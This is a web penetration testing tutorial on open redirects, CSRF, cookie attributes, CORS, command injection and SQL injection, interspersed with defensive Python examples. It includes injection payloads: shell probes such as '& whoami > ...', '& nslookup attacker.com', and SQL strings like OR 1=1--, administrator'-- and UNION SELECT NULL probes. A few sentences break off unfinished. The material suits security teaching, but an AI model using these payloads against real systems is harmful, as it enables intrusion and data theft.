Web penetration testing guide
Open Redirect Vulnerability
An open redirect occurs when a website redirects the user to another page or domain as part of a particular task. The vulnerability arises when no checks are placed on the redirect parameter, so the victim can be redirected to any website while the link still looks valid because it begins with the trusted domain. For example, in this case redirect_to is the parameter to look for.
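One way to validate such a parameter on the server side, as an added example that is not part of the original guide (the host name www.example.com and the function name are assumptions):

```python
from urllib.parse import urljoin, urlparse

# Hypothetical application host; a real deployment substitutes its own.
TRUSTED_HOST = "www.example.com"

def safe_redirect_target(redirect_to: str, default: str = "/") -> str:
    """Return a redirect target that stays on TRUSTED_HOST, or `default`.

    The value is normalised the way browsers normalise it before it is judged:
    whitespace/control characters are dropped and backslashes become slashes
    (browsers treat "/\\evil.example" like "//evil.example"). It is then
    resolved against the trusted origin, and only the path, query and fragment
    are re-emitted, so no foreign host, scheme or userinfo can survive.
    """
    if not redirect_to:
        return default
    candidate = "".join(ch for ch in redirect_to if not ch.isspace()).replace("\\", "/")
    resolved = urljoin(f"https://{TRUSTED_HOST}/", candidate)
    parsed = urlparse(resolved)
    if parsed.scheme not in ("http", "https"):
        return default  # javascript:, data: and other non-web schemes
    if parsed.netloc.lower() != TRUSTED_HOST:
        return default  # absolute, protocol-relative or user@host forms pointing elsewhere
    target = parsed.path or "/"
    if parsed.query:
        target += "?" + parsed.query
    if parsed.fragment:
        target += "#" + parsed.fragment
    return target
```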
A CSRF attack occurs when an attacker uses an HTTP request to obtain a user's information and then uses that information to act on the user's behalf. For example, a user clicks on a malicious link that issues an HTTP GET request to the bank account they are already logged in to, leading to a money transfer from their account to the attacker's account. How the malicious link exploits the bank depends on whether the banking site accepts
The secure and httponly attributes tell the browser how cookies should be sent and read. If a cookie carries the secure attribute, browsers will only send it over HTTPS connections. The httponly attribute tells the browser that the cookie can only be read through HTTP and HTTPS requests, not by client-side script. If a cookie is
If the site accepts GET requests, then the link will contain a hidden form or an <img> tag. When the <img> tag is rendered by the browser it makes an HTTP GET request to the URL in its src attribute. So, if the malicious site were to use a URL that transferred $500 from Bob to Joe that looked like https://www.bank.com/transfer?from=bob&to=joe&amount=500, then a malicious image tag would use this URL as its source value, like in the following tag:
The simplest thing we can do is change the content-type header to text/plain;charset=UTF-8. This allows the attacker to submit an HTML form to the target site without the victim becoming aware.
Websites use CSRF tokens to protect against these attacks. The website generates two tokens: one is given to the user's browser and the other is kept by the website. The two can be compared when needed.
A CSRF attack is possible if:
- an attacker wants to perform a privileged action, e.g. changing a victim's password;
- the website relies only on cookie-based session handling for authentication;
- there are no unpredictable parameters (in the URL) involved, i.e. values that cannot be guessed.
CSRF tokens are unique, unpredictable values generated by the server and given to the client to include in future requests, which prevents CSRF attacks.
- The server sends the client a token.
- The client submits the form with the token.
- The server rejects the request if the token is invalid.
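The issue-and-verify flow above in a keyed variant, where the token handed to the browser is bound to the session by an HMAC so the server need not store a copy per token. This is an added example, not code from the guide; SERVER_KEY and the function names are assumptions.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# Hypothetical server-side secret; a real deployment loads it from configuration.
SERVER_KEY = b"constructed-example-key-not-for-production"

def _mac(session_id: str, nonce: str) -> str:
    """HMAC over session id and nonce; only the server holds SERVER_KEY."""
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()

def issue_csrf_token(session_id: str) -> str:
    """Token to embed in the form: random nonce plus the HMAC binding it to the session.
    The binding stops an attacker from reusing a token from their own session."""
    nonce = secrets.token_urlsafe(16)
    return f"{nonce}.{_mac(session_id, nonce)}"

def verify_csrf_token(session_id: str, submitted: Optional[str]) -> bool:
    """Check the token that came back in a form field or custom header.
    Returns False for missing, malformed, tampered or cross-session tokens."""
    if not submitted or submitted.count(".") != 1:
        return False
    nonce, mac = submitted.split(".")
    # compare_digest runs in constant time, so a forger learns nothing from timing.
    return hmac.compare_digest(mac, _mac(session_id, nonce))
```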
CORS (Cross-Origin Resource Sharing) is the mechanism through which the browser decides whether to share resources with another (different) domain; it is expressed through HTTP headers. CORS is a security mechanism that allows a web page from one domain or origin to access a resource on a different domain (a cross-domain request). The Access-Control-Allow-Origin header in the HTTP protocol indicates which domains are allowed to access a certain resource. It is important to understand CORS before working on CSRF.
The SameSite cookie attribute is another mechanism used to prevent CSRF attacks. The attribute is added in the set-cookie response header and can be given two values: Strict and Lax. If the value is Strict then the browser will not include the cookie in requests that originate from another site.
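A small checker for the cookie attributes discussed above (Secure, HttpOnly, SameSite), run over constructed Set-Cookie headers. This is an added example, not code from the guide; the sample headers and the function name are assumptions.

```python
from typing import Dict, List

# Constructed Set-Cookie headers, as a proxy or scanner would capture them.
SAMPLE_HEADERS = [
    "session=abc123; Path=/; Secure; HttpOnly; SameSite=Strict",
    "session=abc123; Path=/; HttpOnly",
    "prefs=dark; Path=/; Secure; SameSite=None",
]

def check_set_cookie(header: str) -> Dict[str, object]:
    """Parse one Set-Cookie header and list the protections it lacks."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()  # flag attributes get ""
    findings: List[str] = []
    if "secure" not in attrs:
        findings.append("missing Secure: also sent over plain HTTP")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable by client-side script")
    samesite = attrs.get("samesite", "").lower()
    if "samesite" not in attrs:
        findings.append("missing SameSite: browser default decides cross-site sending")
    elif samesite == "none":
        findings.append("SameSite=None: sent on cross-site requests, CSRF defence must come from tokens")
        if "secure" not in attrs:
            findings.append("SameSite=None without Secure is rejected by current browsers")
    return {"name": name, "findings": findings}
```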
Command injection, also known as shell injection, occurs when user input leads to commands being executed on the server side. The attacker is able to execute commands like ifconfig, depending on the type of system the website is hosted on. Note that in order to find a command injection vulnerability we have to check every possible parameter in a particular URL.
Blind injection occurs when the commands are executed on the system but no output is returned to the end user.
- To detect this type of vulnerability we can use the following: & ping -c 10 [target ip] & causing the server to ping the IP address (in most cases its own loopback interface) ten times, which shows up as a noticeable delay in the response.
- Another way to detect blind injection is by redirecting the output, for example & whoami > /var/www/static/whoami.txt & after which we can point the browser at that file to confirm the output.
- Another way to detect this type of vulnerability is the out-of-band technique: we inject a command that triggers a network interaction from the web server to a machine we own, for example & nslookup attacker.com
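The vulnerable pattern beside its hardened form, for a host parameter that feeds a ping utility like the one probed above. This is an added example, not code from the guide; the function names and the hostname allow-list are assumptions.

```python
import ipaddress
import re
import shlex

# Allow-list for a "host" parameter: DNS hostname labels or an IP literal, nothing else.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$)(?:{_LABEL}\.)*{_LABEL}$")

def vulnerable_ping_command(host: str) -> str:
    """The pattern that creates the vulnerability: the parameter is pasted into a
    command string that would later be handed to a shell (shell=True)."""
    return f"ping -c 3 {host}"

def safe_ping_argv(host: str) -> list:
    """Validate `host` and return an argv list for subprocess.run(argv) with no shell,
    so `&`, `;`, `>` and friends never reach an interpreter. Raises ValueError on
    anything that is not a plain hostname or IP address."""
    host = host.strip()
    try:
        ipaddress.ip_address(host)
    except ValueError:
        if not _HOSTNAME_RE.match(host):
            raise ValueError(f"rejected host parameter: {host!r}")
    return ["ping", "-c", "3", host]

def host_accepted(host: str) -> bool:
    """True if safe_ping_argv would accept the value (handy for checks and tests)."""
    try:
        safe_ping_argv(host)
        return True
    except ValueError:
        return False

def is_shell_safe(value: str) -> bool:
    """True if shlex.quote leaves the value untouched, i.e. it contains no character
    a POSIX shell would interpret. A second, defence-in-depth gate."""
    return shlex.quote(value) == value
```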
A SQL injection attack is when an attacker is able to compromise a website or server through crafted SQL queries. These can lead to sensitive data exposure. There are a wide variety of SQL injection vulnerabilities, attacks, and techniques, which arise in different situations. Some common SQL injection examples include:
We can retrieve hidden data by changing a URL, which in turn changes the SQL query on the back end and results in data leakage. For example, GET /filter?category=Gifts'+OR+1=1-- HTTP/1.1 returns all the available categories because the injected OR 1=1 is always true, so the condition matches every category and all of them are leaked.
Suppose we use the administrator'-- payload in the login username field; the -- comments out the rest of the query, so the application ignores the password field.
SQL UNION attacks involve tampering with the queries so that data from other tables is returned in application responses. This is done using the UNION keyword, which allows us to execute additional SELECT queries along with the original one. For a UNION query to work, two key requirements must be met:
- The individual queries must return the same number of columns.
- The data types in each column must be compatible between the individual queries.
In other words, the query after the UNION should have the same number of columns as the query before it, and the data type of each column should match its counterpart.
The first step of such an attack is to determine the number of columns returned by the original query. To do this, inject NULL values at the injection point, e.g. GET /filter?category=Accessories'+UNION+SELECT+NULL,NULL,NULL--, varying the number of NULLs until the server's 500 error turns into a 200 OK response, which indicates that the column count matches and the application is vulnerable. The reason for using NULL as the values returned from the injected SELECT query is that the data types in each column must be compatible between the original and the injected queries. Since NULL is convertible to every commonly used data type, using NULL maximizes the chance that the payload will succeed when the column count is correct.
To find which column can hold string data, replace each NULL in turn with a string and look for a 200 OK response. For example: GET /filter?category=Corporate+gifts'+UNION+SELECT+NULL,'rqk60W',NULL-- HTTP/1.1
If we know the table and column names we can use payloads of this type.
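The three injection cases discussed above (hidden data via OR 1=1, login bypass via administrator'--, and the UNION column-count probe) replayed against a concatenated query and its parameterized replacement, using a constructed in-memory SQLite database. This is an added example, not code from the guide; table contents, function names and the 200/500 mapping are assumptions.

```python
import sqlite3

def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the shop's back-end database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Mug', 'Gifts', 1), ('Pen', 'Gifts', 0),
                                    ('Hat', 'Accessories', 1);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 's3cret'), ('wiener', 'peter');
    """)
    return db

DB = build_db()

def products_vulnerable(category: str) -> list:
    """String concatenation: the parameter becomes part of the SQL grammar."""
    sql = (f"SELECT name, category, released FROM products "
           f"WHERE category = '{category}' AND released = 1")
    return DB.execute(sql).fetchall()

def products_parameterized(category: str) -> list:
    """Bound parameter: the value is compared as a literal, never parsed as SQL."""
    sql = "SELECT name, category, released FROM products WHERE category = ? AND released = 1"
    return DB.execute(sql, (category,)).fetchall()

def login_vulnerable(username: str, password: str) -> bool:
    sql = f"SELECT 1 FROM users WHERE username = '{username}' AND password = '{password}'"
    return DB.execute(sql).fetchone() is not None

def login_parameterized(username: str, password: str) -> bool:
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return DB.execute(sql, (username, password)).fetchone() is not None

def union_probe_status(column_count: int) -> int:
    """Replay the column-count probe against the vulnerable query: 500 when the
    database rejects the UNION (column mismatch), 200 when it is accepted."""
    nulls = ",".join(["NULL"] * column_count)
    try:
        products_vulnerable(f"Accessories' UNION SELECT {nulls}--")
        return 200
    except sqlite3.OperationalError:
        return 500
```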
In blind SQL injection the results of the payload are not returned, i.e. there is no query-related response from the application.